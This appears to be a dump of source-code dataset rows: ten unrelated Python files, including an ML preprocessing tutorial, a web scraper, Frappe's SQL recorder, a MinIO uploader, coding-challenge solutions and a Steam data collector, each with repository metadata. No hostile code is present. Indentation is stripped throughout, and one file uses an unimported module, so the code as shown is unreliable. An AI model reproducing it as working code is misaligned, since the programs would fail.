n_sample = len(lists[0])
for i in range(n_batch):
head = int(n_sample * i / n_batch)
tail = int(n_sample * (i + 1) / n_batch)
ret = [ls[head:tail] for ls in lists]
if len(ret) > 1:
yield ret
else:
yield ret[0]
def batch_by_size(batch_size, *lists, n_sample=None):
if n_sample is None:
n_sample = len(lists[0])
head = 0
while head < n_sample:
tail = min(n_sample, head + batch_size)
ret = [ls[head:tail] for ls in lists]
head += batch_size
if len(ret) > 1:
yield ret
else:
yield ret[0]
|
[
"[email protected]"
] | |
72329a9613e01b0ded0f0edac0113fbaacce05e9
|
470e73b3b8f628616c9e8f82499d634b53d70b63
|
/Part 1 - Data Preprocessing/Section 2 -------------------- Part 1 - Data Preprocessing --------------------/Python/data_preprocessing_tools.py
|
bf961270942e41af2b4e77d5ff0b9eac20050cc9
|
[] |
no_license
|
masko101/ml-with-py-and-r
|
31f8013b174f624b57f58bc5b32c1ae963a6581e
|
392635aea2831c46f57079f81e61f1449c6c3236
|
refs/heads/master
| 2023-02-19T02:09:53.844007 | 2023-02-07T21:32:40 | 2023-02-07T21:32:40 | 289,317,728 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,411 |
py
|
data_preprocessing_tools.py# Data Preprocessing Tools
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Data.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
print(X)
print(y)
# Taking care of missing data
from sklearn.impute import SimpleImputer
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
imputer.fit(X[:, 1:3])
X[:, 1:3] = imputer.transform(X[:, 1:3])
print(X)
# Encoding categorical data
# Encoding the Independent Variable
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [0])], remainder='passthrough')
X = np.array(ct.fit_transform(X))
print(X)
# Encoding the Dependent Variable
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
y = le.fit_transform(y)
print(y)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 1)
print(X_train)
print(X_test)
print(y_train)
print(y_test)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train[:, 3:] = sc.fit_transform(X_train[:, 3:])
X_test[:, 3:] = sc.transform(X_test[:, 3:])
print(X_train)
print(X_test)
|
[
"[email protected]"
] | |
3666744fd63b20a1ba3fc2432b58097f6f0e3956
|
f49a9212f0566fcd1d6bc8226af545e42501a16f
|
/scrape/scrape.py
|
629525912755ae61eda1d8e2003c4d228ccd8fc9
|
[] |
no_license
|
georgenewman10/python
|
5a5c867e6e5f1723a6ea13cedd3710944411c727
|
cbbd43b40c340e6652fe9a3bf1658f4e54eb8f45
|
refs/heads/master
| 2020-04-24T00:12:36.448042 | 2019-05-09T15:40:07 | 2019-05-09T15:40:07 | 171,559,350 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 310 |
py
|
import requests, urllib.request, time
from bs4 import BeautifulSoup
url = 'https://www.bovada.lv/sports/basketball/nba-playoffs/'
game = 'portland-trail-blazers-denver-nuggets-201905012105'
url = url + game
#
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
soup.findAll('a')
|
[
"[email protected]"
] | |
65c4da75fb004f1520cb29a69802bcce620518d9
|
40c4b0c31a5870a9201d3d42a63c5547092e5912
|
/frappe/recorder.py
|
8cbcaa01bb980c8cbdc9a77613591f7700643486
|
[
"MIT"
] |
permissive
|
ektai/frappe3
|
fab138cdbe15bab8214cf623d9eb461e9b9fb1cd
|
44aa948b4d5a0d729eacfb3dabdc9c8894ae1799
|
refs/heads/master
| 2022-12-25T15:48:36.926197 | 2020-10-07T09:19:20 | 2020-10-07T09:19:20 | 301,951,677 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,212 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
from collections import Counter
import datetime
import inspect
import json
import re
import time
import traceback
import frappe
import sqlparse
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import HtmlFormatter
from frappe import _
RECORDER_INTERCEPT_FLAG = "recorder-intercept"
RECORDER_REQUEST_SPARSE_HASH = "recorder-requests-sparse"
RECORDER_REQUEST_HASH = "recorder-requests"
def sql(*args, **kwargs):
start_time = time.time()
result = frappe.db._sql(*args, **kwargs)
end_time = time.time()
stack = list(get_current_stack_frames())
if frappe.conf.db_type == 'postgres':
query = frappe.db._cursor.query
else:
query = frappe.db._cursor._executed
query = sqlparse.format(query.strip(), keyword_case="upper", reindent=True)
# Collect EXPLAIN for executed query
if query.lower().strip().split()[0] in ("select", "update", "delete"):
# Only SELECT/UPDATE/DELETE queries can be "EXPLAIN"ed
explain_result = frappe.db._sql("EXPLAIN {}".format(query), as_dict=True)
else:
explain_result = []
data = {
"query": query,
"stack": stack,
"explain_result": explain_result,
"time": start_time,
"duration": float("{:.3f}".format((end_time - start_time) * 1000)),
}
frappe.local._recorder.register(data)
return result
def get_current_stack_frames():
current = inspect.currentframe()
frames = inspect.getouterframes(current, context=10)
for frame, filename, lineno, function, context, index in list(reversed(frames))[:-2]:
if "/apps/" in filename:
yield {
"filename": re.sub(".*/apps/", "", filename),
"lineno": lineno,
"function": function,
"context": "".join(context),
"index": index,
"locals": json.dumps(frame.f_locals, skipkeys=True, default=str)
}
def record():
if __debug__:
if frappe.cache().get_value(RECORDER_INTERCEPT_FLAG):
frappe.local._recorder = Recorder()
def dump():
if __debug__:
if hasattr(frappe.local, "_recorder"):
frappe.local._recorder.dump()
class Recorder():
def __init__(self):
self.uuid = frappe.generate_hash(length=10)
self.time = datetime.datetime.now()
self.calls = []
self.path = frappe.request.path
self.cmd = frappe.local.form_dict.cmd or ""
self.method = frappe.request.method
self.headers = dict(frappe.local.request.headers)
self.form_dict = frappe.local.form_dict
_patch()
def register(self, data):
self.calls.append(data)
def dump(self):
request_data = {
"uuid": self.uuid,
"path": self.path,
"cmd": self.cmd,
"time": self.time,
"queries": len(self.calls),
"time_queries": float("{:0.3f}".format(sum(call["duration"] for call in self.calls))),
"duration": float("{:0.3f}".format((datetime.datetime.now() - self.time).total_seconds() * 1000)),
"method": self.method,
}
frappe.cache().hset(RECORDER_REQUEST_SPARSE_HASH, self.uuid, request_data)
frappe.publish_realtime(event="recorder-dump-event", message=json.dumps(request_data, default=str))
self.mark_duplicates()
request_data["calls"] = self.calls
request_data["headers"] = self.headers
request_data["form_dict"] = self.form_dict
frappe.cache().hset(RECORDER_REQUEST_HASH, self.uuid, request_data)
def mark_duplicates(self):
counts = Counter([call["query"] for call in self.calls])
for index, call in enumerate(self.calls):
call["index"] = index
call["exact_copies"] = counts[call["query"]]
def _patch():
frappe.db._sql = frappe.db.sql
frappe.db.sql = sql
def do_not_record(function):
def wrapper(*args, **kwargs):
if hasattr(frappe.local, "_recorder"):
del frappe.local._recorder
frappe.db.sql = frappe.db._sql
return function(*args, **kwargs)
return wrapper
def administrator_only(function):
def wrapper(*args, **kwargs):
if frappe.session.user != "Administrator":
frappe.throw(_("Only Administrator is allowed to use Recorder"))
return function(*args, **kwargs)
return wrapper
@frappe.whitelist()
@do_not_record
@administrator_only
def status(*args, **kwargs):
return bool(frappe.cache().get_value(RECORDER_INTERCEPT_FLAG))
@frappe.whitelist()
@do_not_record
@administrator_only
def start(*args, **kwargs):
frappe.cache().set_value(RECORDER_INTERCEPT_FLAG, 1)
@frappe.whitelist()
@do_not_record
@administrator_only
def stop(*args, **kwargs):
frappe.cache().delete_value(RECORDER_INTERCEPT_FLAG)
@frappe.whitelist()
@do_not_record
@administrator_only
def get(uuid=None, *args, **kwargs):
if uuid:
result = frappe.cache().hget(RECORDER_REQUEST_HASH, uuid)
lexer = PythonLexer(tabsize=4)
for call in result["calls"]:
for stack in call["stack"]:
formatter = HtmlFormatter(noclasses=True, hl_lines=[stack["index"] + 1])
stack["context"] = highlight(stack["context"], lexer, formatter)
else:
result = list(frappe.cache().hgetall(RECORDER_REQUEST_SPARSE_HASH).values())
return result
@frappe.whitelist()
@do_not_record
@administrator_only
def delete(*args, **kwargs):
frappe.cache().delete_value(RECORDER_REQUEST_SPARSE_HASH)
frappe.cache().delete_value(RECORDER_REQUEST_HASH)
|
[
"[email protected]"
] | |
e526dff4533b0e9972e26f65b6d19e52f181525e
|
9e36de2b7954ce9d093bf7512faa8e66047ba34e
|
/main.py
|
1035f7b2cc27442b8df828a62bb96d47a4bcd618
|
[] |
no_license
|
hlcooll/minioY
|
1928e39cc3e0a7965c7c37a811ccd537256c92bb
|
3026798b18528acfc92579e4876ba9eacb6536cf
|
refs/heads/main
| 2023-02-17T20:03:29.513388 | 2021-01-22T07:31:46 | 2021-01-22T07:31:46 | 331,869,131 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,416 |
py
|
from minio import Minio
from minio.error import S3Error
from progress.prog import Progress
minioClient = Minio('127.0.0.1:9000',
access_key='usename',
secret_key='password',secure=False
)
# Create bucket.
class minioCreateBucket(object):
#init
def __init__(self,newPersonName):
self.name=newPersonName
try:
minioClient.make_bucket(self.name, location="us-east-1")
except S3Error as err:
print(err)
# Upload data.
def upload(self,object,filename):
try:
minioClient.fput_object(self.name, object,
filename)
except FileNotFoundError as err:
print(err)
except S3Error as err:
print(err)
# Upload data with progress bar.
def uploadResult(self,object,filename):
result = minioClient.fput_object(
self.name, object, filename,
progress=Progress(),
)
print(
"created {0} object; etag: {1}, version-id: {2}".format(
result.object_name, result.etag, result.version_id,
),
)
if __name__ == '__main__':
object_name='sw.md'
filename_url="/Users/hualei/hugo/hlcooll.github.io/content/kubernetes/ceph/ceph.md"
miniB = minioCreateBucket("maylogs")
miniB.uploadResult(object_name,filename_url)
|
[
"[email protected]"
] | |
871e74c940da56c3387dffad57b313ca22cdc089
|
9d961bd6a590cc96db0c1f9c72d84e3a66636edf
|
/심심풀이땅콩/[백준]4673.py
|
76fb463f5fde7bf3313b00ca4769b70034e63f75
|
[] |
no_license
|
0equal2/Python_Programming
|
bae65338929e8e1a88247b8d23de805caa026702
|
2ac1d0262320220f49cbdb45e787e55e994d0b0f
|
refs/heads/master
| 2023-05-14T22:13:41.583214 | 2021-06-09T03:04:51 | 2021-06-09T03:04:51 | 304,628,012 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 195 |
py
|
###[백준]4673
memo=[0]*10001
for i in range(1,10001):
newnum=i+sum(list(map(int,list(str(i)))))
if newnum<=10000:
memo[newnum]=1
if memo[i]==0:
print(i)
|
[
"[email protected]"
] | |
33478fe87820b50085a43d69c5d4905485208e70
|
aec63b7086f30d5b10c9da01f6b2a2fa3bd1dfe0
|
/blog/migrations/0002_blogpost_user.py
|
f726647c04b6bf69de6f6c3fae79606d4741c9e8
|
[] |
no_license
|
Ajith1202/BlogPost
|
711933c562a88b42509e3babe42171d0b39e229a
|
91417ec65635534ae37aebe144963b28e2f3dd19
|
refs/heads/master
| 2022-08-01T19:22:05.732859 | 2020-05-29T06:31:31 | 2020-05-29T06:31:31 | 267,769,047 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 585 |
py
|
# Generated by Django 3.0.6 on 2020-05-27 09:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='blogpost',
name='user',
field=models.ForeignKey(default=1, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"[email protected]"
] | |
7ff1083ed831a508777187c4dcf4392f0dcd3481
|
efbe77abe49694f853b48f0726aa4968224b1a2b
|
/my_project/src/collect_new_user.py
|
9dcb44e072110bfa8e2b81b694432b33802afb11
|
[] |
no_license
|
johnnysand7/steam-study
|
f7cc918418fa77ede1fc2a1d04d83849b26a28d7
|
17100b97ade1d4b0d0ee273c071b9efa4cf3ee10
|
refs/heads/master
| 2021-01-21T14:24:05.004016 | 2016-06-24T17:52:10 | 2016-06-24T17:52:10 | 55,985,030 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,665 |
py
|
import cPickle
import operator
import os
import re
import requests
import time
import pandas as pd
from bs4 import BeautifulSoup
class CollectNewUser():
def __init__(self, popular_games):
self.popular_games = popular_games
self.uid = self.determine_user_input()
self.key = os.environ["ACCESS_STEAM"]
self.bans = None
self.user = None
self.friends = None
def determine_user_input(self):
user_input = raw_input("Paste your Steam community profile url here: ")
if len(user_input) == 17:
if user_input.isdigit():
return user_input
else:
return "Maybe you tried your 17-digt Steam ID,\
which was not recognized"
elif "steamcommunity.com" not in user_input:
return "Must be a Steam Community URL!"
else:
try:
response = requests.get(user_input)
uid = re.findall(r"[0-9]{17}", response.text)[0]
if len(uid) != 17:
return "Url did not work"
return uid
except IndexError:
return "Could not find your profile."
except requests.ConnectionError:
return "Could not find your profile."
def get_user_info(self):
"""
For my model, I need the new user's:
personastate
location (eventually)
profile avatar url (eventually)
other things?
"""
url = "http://api.steampowered.com/ISteamUser/GetPlayerSummaries"\
+ "/v0002/?key=" + self.key + "&steamids=" + self.uid
user = requests.get(url).json()["response"]["players"][0]
if user["communityvisibilitystate"] == 1:
return None
self.user = {k: user[k] for k in ("personastate", "timecreated",
"steamid")}
def get_bans(self):
url = "http://api.steampowered.com/ISteamUser/GetPlayerBans"\
+ "/v1/?key=" + self.key + "&steamids=" + self.uid
response = requests.get(url)
self.s_code = str(response.status_code).startswith("2")
ban = response.json()["players"][0]
desired_keys = set(ban.keys()) - set(["SteamId", "DaysSinceLastBan",
"EconomyBan", "NumberOfGameBans",
"NumberOfVACBans"])
self.bans = {k: ban[k] for k in desired_keys}
def get_friends(self):
url = "http://api.steampowered.com/ISteamUser/GetFriendList/v0001\
/?key=" + self.key + "&steamid=" + self.uid + "&relationship=all"
response = requests.get(url)
if str(response.status_code).startswith("2"):
friends = response.json()["friendslist"]["friends"]
excluding = set(["relationship"])
self.friends = len(friends)
else:
return None
def get_game_info(self):
url = "http://api.steampowered.com/IPlayerService/GetOwnedGames"\
+ "/v0001/?key=" + self.key + "&steamid=" + self.uid + \
"&include_appinfo=1&include_played_free_games=1&format=json"
response = requests.get(url)
if str(response.status_code).startswith("2"):
try:
games = response.json()["response"]["games"]
for i, game in enumerate(games):
desired_keys = set(game.keys()) -\
set(["has_community_visible_stats",
"img_icon_url", "img_logo_url"])
if "playtime_2weeks" in desired_keys:
game = {k: game[k] for k in desired_keys}
games[i] = game
else:
game = {k: game[k] for k in desired_keys}
game[u"playtime_2weeks"] = 0
games[i] = game
return games
except KeyError:
return None
else:
return None
def game_user_frames(self):
game_df = pd.DataFrame(self.get_game_info())
owned, played = len(game_df), len(game_df[game_df["playtime_forever"
] != 0])
game_df = game_df[game_df["appid"].isin(self.popular_games)]
game_df["rating"] = pd.cut(game_df["playtime_forever"],
bins=[-1, 60, 120, 180, 240, 300,
10e10],
labels=[0, 1, 2, 3, 4, 5]).astype(int)
game_df["user_id"] = ((self.uid+" ") * len(game_df)).split()
game_df["item_id"] = game_df["appid"].astype(int)
game_df = game_df[["item_id", "rating", "user_id"]]
game_df = graphlab.SFrame(game_df)
user_dict = dict(self.bans.items() + self.user.items() +
[("num_friends", self.friends),
("num_played", played),
("num_games", owned)])
user_df = pd.DataFrame([user_dict])
user_df["timecreated"] = int(round((time.time() -
user_df["timecreated"]) /
(3600 * 24 * 365), 2))
user_df.rename(columns={"steamid": "user_id"}, inplace=True)
user_df = graphlab.SFrame(user_df)
return user_df, game_df
if __name__ == "__main__":
with open("../data/top_appids.csv", "rb") as f:
game_ids = f.read()
game_ids = game_ids.replace("\n", "").split(",")[2:]
|
[
"[email protected]"
] | |
2055a94fef3753eb2044e88777c867cb70cfd5ba
|
0fc2b11f52085b584bc52f4982c297dd2c03e8b2
|
/Programmers/Level1/콜라츠 추측.py
|
6a895e14e41a65d5df6cf3b720dade065a7454ed
|
[] |
no_license
|
yw9142/Solving-algorithmic-problems
|
ec9cdb23492ec10e494937f6f221d54d8987be3d
|
d78b2d518608bd89b463a0e8da1ca30e1dddaec3
|
refs/heads/master
| 2023-01-10T06:52:55.938545 | 2020-11-10T16:09:05 | 2020-11-10T16:09:05 | 277,123,609 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 313 |
py
|
def solution(num):
if num == 1:
return 0
count = 0
while True:
if num % 2 == 0:
num //= 2
else:
num = (num * 3) + 1
count += 1
if num == 1:
break
if count >= 500:
return -1
return count
|
[
"[email protected]"
] | |
618421f2c2ca41e846e9a550696550ebdaf5f9b0
|
05d04370e2547aba75c5a6ddfab52ee66a4421ce
|
/ccpweb/ccpweb/views.py
|
35e5668861f40f36e8c3866e01adb1ef928d98ee
|
[
"BSD-3-Clause"
] |
permissive
|
story645/ccp-viz-toolkit
|
4488404518dee1b4dc0cb33ac51c19aa15ee3156
|
cd75f674d7b17a2bba8ed4bffb6853fae94885c5
|
refs/heads/master
| 2020-05-19T09:20:37.152986 | 2015-03-26T16:32:14 | 2015-03-26T16:32:14 | 32,113,131 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,425 |
py
|
#!/usr/bin/env python
#
# views.py
#
# Hannah Aizenman, 2011-08
#
# http://www.opensource.org/licenses/bsd-license.php
"""Views (web pages) served by ccpweb.
"""
__docformat__ = "restructuredtext"
# http://docs.python.org/library/os.html
import os
# https://docs.pylonsproject.org/projects/pyramid/1.0/api/response.html
from pyramid.response import Response
# http://docs.pylonsproject.org/projects/pyramid/1.0/api/view.html
from pyramid.view import view_config
# http://docs.pylonsproject.org/projects/pyramid/1.0/api/exceptions.html
from pyramid.exceptions import NotFound
from ccplib.datahandlers.ccpdata import CCPData
from ccpweb.resources import DataList, AlgList, Static
from ccpweb import tasks
SITE_LIB_ROOT = os.path.abspath(os.path.dirname(__file__))
# ccpviz.html
@view_config(context=Static, request_method='GET')
def page_view(context, request):
key = request.traversed[0]
pagepath = os.path.join(SITE_LIB_ROOT, key)
try:
page = open(pagepath).read()
return Response(content_type='text/html', body=page)
except IOError, e:
return NotFound()
# list of available datasets
@view_config(context=DataList, request_method='GET', renderer='json')
def get_datalist(context, request):
return tasks.get_configs(" ")
# list of algorithms
@view_config(context=AlgList, request_method='GET', renderer='json')
def get_alglist(context, request):
return tasks.alglist()
# random metadata about the dataset
@view_config(context=CCPData, request_method='GET')
def get_objattrs(context, request):
return Response(tasks.objattrs(context, request))
#bundles time and grid in one request/json object
@view_config(context=CCPData, name='menu', request_method='GET', renderer='json')
def get_dsmenu(context, request):
dsmenu = dict(time=tasks.get_time(context))
dsmenu.update(tasks.get_grid(context))
return dsmenu
# Returns dictionary of valid ranges
@view_config(context=CCPData, name='validrange', request_method='GET', renderer='json')
def get_valid_range(context, request):
return tasks.valid_range(context)
# returns time as a long space seperated string so that
# it's used to populate autocomplete
@view_config(context=CCPData, name='time', request_method='GET')
def get_time(context, request):
time = tasks.get_time(context)
return Response("\n".join(time))
# bundles the lat and lon arrays/list into a json object
@view_config(context=CCPData, name='grid', request_method='GET', renderer='json')
def get_grid(context, request):
latlon = tasks.get_grid(context)
return latlon
# returns the data/doesn't quite work as expected
@view_config(context=CCPData, name='data', request_method='GET')
def get_data(context, request):
image = tasks.select_data(context, request.subpath)
return Response(image)
# returns the graph as a response
@view_config(context=CCPData, name='graph', request_method='GET')
def make_graph(context, request):
image = tasks.select_data(context, request.subpath)
graph_obj = tasks.set_graph(context, image.ndim)
return tasks.drawgraph(graph_obj, image, request.subpath)
# 404 page-should be replaced with something fun
@view_config(context='pyramid.exceptions.NotFound')
def notfound_view(self):
return Response('404: Page Not Found.')
# used to test stuff/part of the paster default
def my_view(request):
return {'project':'ccpweb'}
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.